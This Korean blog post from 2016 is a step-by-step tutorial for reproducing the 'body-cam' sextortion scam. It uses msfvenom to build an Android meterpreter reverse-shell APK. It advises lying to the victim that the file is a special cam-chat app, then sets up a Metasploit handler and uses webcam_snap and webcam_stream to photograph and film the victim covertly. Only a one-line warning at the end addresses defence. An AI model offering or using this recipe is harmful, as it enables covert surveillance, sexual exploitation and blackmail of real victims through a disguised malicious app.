관리 메뉴

Lucete

요즘 유행 하던 몸캠 (기초방식) 본문

Metasploit

요즘 유행 하던 몸캠 (기초방식)

LuCeT3 2016. 12. 15. 22:37

요즘 몸캠이 유행을 했었다.


대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.)


그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :)


이제 그것을 재연해보자 


그전에 모든 책임은 사용자 본인에게 있습니다.

시작해보자 :X


먼저 service apache2 start로 아파치를 실행 시켜주고 


service postgresql start 로 postgresql 또한 시킨다.


궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다.



그 후 이제 악성코드를 만들어야 하는데...

명령어 msfvenom을 이용 하여 만들어 보자.

msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker IP LPORT=하고싶은 포트번호 R > filename.apk



이렇게 하면 파일이 /root 폴더에 파일이 만들어 져있는 것을 확인 할수 있다.




그 파일을 이제 몸캠 전용파일이라고 뻥을 치고 victim에게 보내어 설치를 하게 한다. 



그럼 공격자 쪽에서는 핸들러를 얻어야 하니


msfconsole을 이용하여 



use exploit/multi/handler 

set payload [아까 apk파일 만들때 -p 하고 넣은 코드]

set LHOST attacker IP

set LPORT [아까 하고싶은 포트 번호 apk만들때랑 같은 번호여야 한다.]

exploit 하고 기다리면 



apk를 실행 시키면 이제 공격자는 권한을 얻게 된다.



help 를 이용하여 명령어를 보면 

우리는 몸캠을 할꺼니 흐흐흐

webcam 위주로 보면 될것같다.



webcam_snap 명령어를 쓰면 사진을 찍어준다. 컴퓨터로 가상 안드로이드 폰을 만들어 카메라가 없어 이렇게 뜨지만 실제로는 찍힌다.


webcam_stream 명령어를 사용하면 실시간으로 동영상을 찍어 보여준다.


조심하자... 허가되지않고 아무 apk나 받지말자...


0 Comments
댓글쓰기 폼